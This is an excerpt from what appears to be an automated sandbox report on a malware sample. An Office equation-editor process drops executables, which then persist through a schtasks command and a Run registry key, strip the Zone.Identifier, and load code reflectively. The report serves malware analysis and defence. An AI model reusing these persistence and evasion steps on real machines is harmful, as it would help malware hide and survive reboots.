                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeMutant created: \Sessions\1\BaseNamedObjects\fjImFVBEVvLOj
                      Source: 7.2.edufyrigefy4utwgqeoriufj4ce.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 7.2.edufyrigefy4utwgqeoriufj4ce.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 11.2.newapp.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 11.2.newapp.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: edufyrigefy4utwgqeoriufj4ce.exe.2.dr, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: booobb[1].exe.2.dr, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: yxnDFepLbf.exe.4.dr, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 4.0.edufyrigefy4utwgqeoriufj4ce.exe.f90000.0.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 4.2.edufyrigefy4utwgqeoriufj4ce.exe.f90000.1.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: newapp.exe.7.dr, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 7.2.edufyrigefy4utwgqeoriufj4ce.exe.f90000.1.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 7.0.edufyrigefy4utwgqeoriufj4ce.exe.f90000.0.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 8.2.newapp.exe.cc0000.1.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 8.0.newapp.exe.cc0000.0.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 11.2.newapp.exe.cc0000.1.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 11.0.newapp.exe.cc0000.0.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 12.2.newapp.exe.cc0000.1.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 12.0.newapp.exe.cc0000.0.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 15.0.newapp.exe.cc0000.0.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 15.2.newapp.exe.cc0000.0.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 16.2.newapp.exe.cc0000.0.unpack, MainForm.cs.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 4_2_00C414BF push es; retn 0000h
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 4_2_00C41469 push es; retn 0000h
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 4_2_00C41429 push es; retn 0000h
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 7_2_00221BE3 push ebx; iretd
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 7_2_00F81AA2 pushfd ; retn 001Ch
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeCode function: 7_2_00F81A50 push esp; retn 001Ch
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 11_2_00261BE3 push ebx; iretd
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeCode function: 17_2_00221C13 push ebx; iretd
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.77653013154
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.77653013154
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.77653013154
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.77653013154
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeFile created: C:\Users\user\AppData\Roaming\newapp\newapp.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\booobb[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeFile created: C:\Users\user\AppData\Roaming\yxnDFepLbf.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeFile created: C:\Users\user\AppData\Local\Temp\tmpG796.tmp (copy)Jump to dropped file

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yxnDFepLbf' /XML 'C:\Users\user\AppData\Local\Temp\tmp7B0A.tmp'
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run newappJump to behavior
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run newappJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeFile opened: C:\Users\user\AppData\Roaming\newapp\newapp.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\edufyrigefy4utwgqeoriufj4ce.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeProcess information set: NOOPENFILEERRORBOX
